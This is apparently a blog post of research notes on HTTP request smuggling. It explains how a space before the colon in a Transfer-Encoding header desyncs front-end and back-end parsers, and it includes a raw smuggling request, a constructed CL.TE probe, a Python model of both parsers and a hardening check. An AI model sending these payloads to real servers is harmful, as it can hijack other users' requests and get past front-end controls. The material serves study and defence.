HTTP Smuggling & Desync Attacks

At Defcon James Kettle presented HTTP Smuggling Reborn, which revitalized the request smuggling attack and surfaced a new plethora of issues around how HTTP/1.1 requests are parsed. So, as one does, I decided to dig into it a bit and work through the vectors. I quickly discovered that the trick behind this payload is a space between the header name and the colon in `Transfer-encoding : chunked`: a parser that matches header names exactly does not recognise it as Transfer-Encoding and frames the body with Content-Length, while a parser that trims the name honours it and reads the body as chunked, so the two ends of the connection disagree about where the request ends (other header obfuscation variants were discovered later). Here is an example payload that was tested against a load balancer and caused desyncs and smuggled requests. I'll be posting more about this, but I wanted to get the notes from my initial research up first. I plan to do the labs PortSwigger provides, since the content is so great and free (you should do them too).

Sample request


```http
POST /razzamatazz HTTP/1.1
Host: www.asdfghj.com
Connection: close
Content-Length: 4
Origin: https://www.asdfghj.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://www.asdfghj.com/ba/mb/oozling
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,ru;q=0.8
X-Forwarded-For: 1.1.1.26
Transfer-encoding : chunked

96
XGET /ba/mb/oozling HTTP/1.1
X-Foo: b

```

I also did some additional testing with load balancers in front of back-ends built with particular languages and frameworks (Python Flask, PHP, Node.js Express and the Golang http client); these combinations were vulnerable to the smuggling technique because the components did not agree on how to handle a request carrying both Transfer-Encoding and Content-Length. RFC 7230 section 3.3.3 is explicit here: when both headers are present, Transfer-Encoding overrides Content-Length, such a message ought to be treated as an error because it may indicate smuggling, and a proxy that forwards it anyway must strip the Content-Length first. Any pair of components where one side recognises the (possibly obfuscated) Transfer-Encoding header and the other does not is a desync candidate.
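As an added illustration (my own example code, not from James Kettle's research, PortSwigger, or any of the frameworks named above), here is a small Python model of two HTTP/1.1 parsers that differ only in whether they trim whitespace from header names before matching Transfer-Encoding. Feeding both the same byte stream shows how a front-end and a back-end can split it differently: on a constructed CL.TE probe the strict parser frames by Content-Length while the lenient one stops at the zero-length chunk and leaves a stray byte that becomes the prefix of the next request; on the sample request above, the lenient parser expects a 0x96 = 150-byte chunk that never arrives and would sit waiting, while the strict one forwards only the first four bytes of the body. The host and paths come from the sample request; the CL.TE probe, the follow-up request and the hardening check at the end are assumptions constructed for the demo.

```python
"""Two toy HTTP/1.1 request parsers that differ only in how they match the
Transfer-Encoding header name, plus a front-end hardening check.
Constructed example for this post, not code from PortSwigger or the original
research; PAGE_PAYLOAD is trimmed from the sample request, the rest is invented."""
from dataclasses import dataclass


@dataclass
class Parsed:
    request_line: bytes
    headers: dict      # lower-cased header name -> stripped value
    body: bytes
    framing: str       # "content-length", "chunked" or "incomplete"
    leftover: bytes    # bytes after this message, i.e. the start of the next one


def parse_headers(head: bytes, strict_names: bool):
    """Strict: b'transfer-encoding ' (trailing space) stays a distinct, unrecognised
    header.  Lenient: the name is stripped, so the header is honoured."""
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        if not strict_names:
            name = name.strip()
        headers[name.lower()] = value.strip()
    return lines[0], headers


def read_chunked(data: bytes):
    """Decode a chunked body; returns (body, leftover, complete)."""
    body, pos = b"", 0
    while True:
        eol = data.find(b"\r\n", pos)
        if eol == -1:
            return body, b"", False                # chunk-size line not here yet
        size = int(data[pos:eol].split(b";")[0].strip(), 16)
        pos = eol + 2
        if size == 0:                              # last chunk: skip trailers to empty line
            while True:
                end = data.find(b"\r\n", pos)
                if end == -1:
                    return body, b"", False
                if end == pos:
                    return body, data[pos + 2:], True
                pos = end + 2
        if len(data) < pos + size + 2:
            return body, b"", False                # still waiting for chunk data
        body += data[pos:pos + size]
        pos += size + 2


def parse_one(stream: bytes, strict_names: bool) -> Parsed:
    head, sep, rest = stream.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete header block")
    request_line, headers = parse_headers(head, strict_names)
    # RFC 7230 3.3.3: a recognised Transfer-Encoding wins over Content-Length
    if headers.get(b"transfer-encoding") == b"chunked":
        body, leftover, complete = read_chunked(rest)
        return Parsed(request_line, headers, body,
                      "chunked" if complete else "incomplete", leftover)
    length = int(headers.get(b"content-length", b"0"))
    if len(rest) < length:
        return Parsed(request_line, headers, rest, "incomplete", b"")
    return Parsed(request_line, headers, rest[:length], "content-length", rest[length:])


# Trimmed from the sample request above (unrelated headers dropped).
PAGE_PAYLOAD = (b"POST /razzamatazz HTTP/1.1\r\nHost: www.asdfghj.com\r\n"
                b"Content-Length: 4\r\n"
                b"Transfer-encoding : chunked\r\n\r\n"    # space before the colon
                b"96\r\nXGET /ba/mb/oozling HTTP/1.1\r\nX-Foo: b\r\n\r\n")

# Constructed CL.TE probe: Content-Length covers "0\r\n\r\nG", chunked ends before "G".
CLTE_PROBE = (b"POST / HTTP/1.1\r\nHost: www.asdfghj.com\r\nContent-Length: 6\r\n"
              b"Transfer-encoding : chunked\r\n\r\n0\r\n\r\nG")
# Constructed follow-up request on the same connection (e.g. another user's).
NEXT_REQUEST = b"POST / HTTP/1.1\r\nHost: www.asdfghj.com\r\nContent-Length: 0\r\n\r\n"


def desync_demo(first: bytes, second: bytes):
    """Return the request line each side believes starts the *second* request."""
    stream = first + second
    front = parse_one(stream, strict_names=True)    # frames by Content-Length
    back = parse_one(stream, strict_names=False)    # frames by chunked encoding
    return (parse_one(front.leftover, True).request_line,
            parse_one(back.leftover, False).request_line)


def is_ambiguously_framed(stream: bytes) -> bool:
    """Hardening check a front-end could apply (my suggestion, not a product's):
    reject requests carrying both TE and CL, or whose header names only match
    after whitespace normalisation."""
    head = stream.partition(b"\r\n\r\n")[0]
    _, strict = parse_headers(head, strict_names=True)
    _, lenient = parse_headers(head, strict_names=False)
    both = b"transfer-encoding" in lenient and b"content-length" in lenient
    return both or strict.keys() != lenient.keys()
```

Run `desync_demo(CLTE_PROBE, NEXT_REQUEST)` and the front-end reports the next request line as `POST / HTTP/1.1` while the back-end reports `GPOST / HTTP/1.1`, which is exactly the poisoned-socket effect the desync produces; `parse_one(PAGE_PAYLOAD, False).framing` comes back `incomplete`, the timing signal a CL.TE probe relies on. The real parsers in a given load balancer and back-end framework differ in more ways than this one normalisation rule, so treat the model as a way to reason about a pair, not as a scanner.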